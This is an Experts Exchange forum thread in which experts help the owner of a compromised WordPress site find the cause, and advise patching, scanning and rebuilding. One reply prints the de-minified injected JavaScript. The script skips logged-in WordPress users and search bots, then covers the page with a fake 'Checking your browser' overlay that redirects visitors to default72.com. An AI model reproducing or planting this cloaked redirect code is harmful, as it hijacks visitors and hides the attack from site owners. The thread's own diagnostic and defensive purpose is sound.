php website

I have a website www.saberpoint.com. suddenly some thing happened to the word press website and the menu started showing on the top.  We came to know our site got compromised, and we are trying to fix this.  Can someone help me out to see what is wrong in the page.
romeiovasuAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Jim HornSQL Server Data DudeCommented:
Curiosity overwhelms me ... Are you asking experts here to navigate to a site that is 'comprimised', and if so define 'comprimised' for us.
romeiovasuAuthor Commented:
no the compromised one is got fixed.  Now we asking is there anything that we can fix the css sheet.
RobOwner (Aidellio)Commented:
That's not something you'll get a lot of attention on as none of us want our computers compromised.  I've opened the page in incognito, which still isn't ideal but it was enough to show that:

http://cdn.callrail.com/companies/225762002/7ea1c4ca77e56aef53dd/12/swap.js

is the script causing your issues.  You'll find it included at the bottom of the page.  

WARNING to other experts: It creates tracking cookies and referrer cookies to obviously read when you click through to "check your browser"

But the real issue here is how it got there in the first place.  Does your site allow for content to be entered in any way?  how do you parse, filter and sanitize your input??

You should be reviewing all your code that accepts any kind of input with reference to filtering in PHP (including sanitization and validation): http://php.net/manual/en/book.filter.php

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Your Guide to Achieving IT Business Success

The IT Service Excellence Tool Kit has best practices to keep your clients happy and business booming. Inside, you’ll find everything you need to increase client satisfaction and retention, become more competitive, and increase your overall success.

RobOwner (Aidellio)Commented:
no the compromised one is got fixed
Not http://www.saberpoint.com/.  That IS still compromised

Clipboard01.jpg
romeiovasuAuthor Commented:
Hi Rob,

i didnt understand what you are saying.  If you dont mind can you explain me more detail please.
MacleanSystem EngineerCommented:
Problem here is that you won't know which files have been compromised, and which port was exploited or which vulnerability. As far as I can see you have malware running on it right now which was injected via javascript vulnerabilities, and might be best taking it offline to minimize loss of data if they are harvesting information using the vulnerability.

Personally I would be tempted to build a clean new server, make sure it is patched and secured.
You could try running a rootkit scanner on it or malware sweep. ClamAV is often used to locate malware on Linux

Unfortunately my expertise does not go much beyond this, and it would be best getting a professional opinion added to resolve your issue in full.

I found some info running a free scan for vulnerabilities here

Result =
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.script-injection.003
RobOwner (Aidellio)Commented:
Sorry, just remembered you mentioned it's a WordPress site.  Are you on the latest version of WordPress?  Are all your plugins and themes up to date?  Any one of these elements could have a vulnerability that exposed your site
RobOwner (Aidellio)Commented:
I agree with Maclean, you need a professional to sift through this or start from scratch on another server.   If you've got a lot of content then starting from scratch is going to be a pain.

The "malware" will most likely be in your database and injected by a malicious user so scanning your server will most likely turn up nothing.

Please refer to section 5 of my article below that has some information relating to cross site scripting and SQL/JS injection:
http://www.experts-exchange.com/articles/12871/Avoiding-mailto-and-how-to-capture-a-web-enquiry.html

I found that js script by looking at the source code of the page.
MacleanSystem EngineerCommented:
According to redbot you are using PHP/5.4.45 engine
This one has various vulnerabilities as it is behind in patch levels by about 2-3 months.

https://msisac.cisecurity.org/advisories/2015/2015-105.cfm
https://www.exploit-db.com/exploits/38123/

So I would say that the likely cause was not having patched the we server frequently.

I will leave things with Rob and others however, he seems to have a good knowledge on these problems.
Jason C. LevineDon't talk to me.Commented:
Once a WordPress site has been compromised, you have to take a LOT of steps to make sure it is clean again. Maclean posted the link to Sucuri, which will scan the front-facing site for obvious vulnerabilities but there may be other, non-obvious backdoors now in your installation.  This article:

http://www.experts-exchange.com/articles/10806/Detecting-Recovering-From-and-Preventing-WordPress-Site-Hacks.html

talks about steps you can take to attempt to recover but if you are not familiar with WordPress hacks and overall security issues, pay Sucuri to clean you up.
Scott FellDeveloper & EE ModeratorCommented:
Not fixed yet.  See line 451 (when you view source)

The code is on one line, but here I have expanded it.
function start() {
    function t(e) {
        var t = document.cookie,
            n = t.indexOf(" " + e + "=");
        n == -1 && (n = t.indexOf(e + "="));
        if (n == -1) t = null;
        else {
            n = t.indexOf("=", n) + 1;
            var r = t.indexOf(";", n);
            r == -1 && (r = t.length), t = unescape(t.substring(n, r))
        }
        return t
    }

    function n(e, t, n) {
        var r = new Date;
        r.setDate(r.getDate() + n);
        var i = escape(t) + (n == null ? "" : "; expires=" + r.toUTCString());
        document.cookie = e + "=" + i
    }

    function r() {
        return document.cookie ? document.cookie.indexOf("wordpress_logged") !== -1 || document.cookie.indexOf("wp-settings") !== -1 || document.cookie.indexOf("referrerRedirectCookie") !== -1 || document.cookie.indexOf("wordpress_test") !== -1 ? (console.log("true"), !0) : (console.log("false2"), !1) : (console.log("false1"), !1)
    }
    if (!r()) {
        n("referrerRedirectCookie", "do not redirect", 730);
        var e = navigator.userAgent;
        if (!e || e.length == 0) return;
        e = e.toLowerCase(), e.indexOf("google") == -1 && e.indexOf("bot") == -1 && e.indexOf("crawl") == -1 && hideWebSite()
    }
}

function createPopup() {
    var e = document.createElement("div");
    e.style.position = "absolute", e.style.width = "100%", e.style.height = "100%", e.style.left = 0, e.style.top = 0, e.style.backgroundColor = "white", e.style.zIndex = 99999, document.body.appendChild(e), e.onclick = function() {
        window.location = w_location
    };
    var t = document.createElement("p");
    return t.innerText = "Checking your browser before accessing " + window.location.host + "...", t.style.textAlign = "center", t.style.fontSize = "x-large", t.style.position = "relative", t.textContent = t.innerText, e.appendChild(t), e
}

function createButton() {
    var e = document.createElement("div");
    return e.style.position = "absolute", e.style.top = "20%", e.style.left = "10%", e.style.right = "10%", e.style.width = "80%", e.style.border = "1px solid black", e.style.textAlign = "center", e.style.verticalAlign = "middle", e.style.margin = "0, auto", e.style.cursor = "pointer", e.style.fontSize = "xx-large", e.style.borderRadius = "5px", e.onclick = function() {
        window.location = w_location
    }, e.onmouseover = function() {
        e.style.border = "1px solid red", e.style.color = "red"
    }, e.onmouseout = function() {
        e.style.border = "1px solid black", e.style.color = "black"
    }, e.innerText = "Continue", e.textContent = e.innerText, e
}
var w_location = "http://default72.com",
    hideWebSite = function() {
        var e = createPopup(),
            t = createButton();
        e.appendChild(t)
    },
    readyStateCheckInterval = setInterval(function() {
        if (document.readyState === "complete" || document.readyState == "interactive") clearInterval(readyStateCheckInterval), start()
    }, 10);

Open in new window

It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
PHP

From novice to tech pro — start learning today.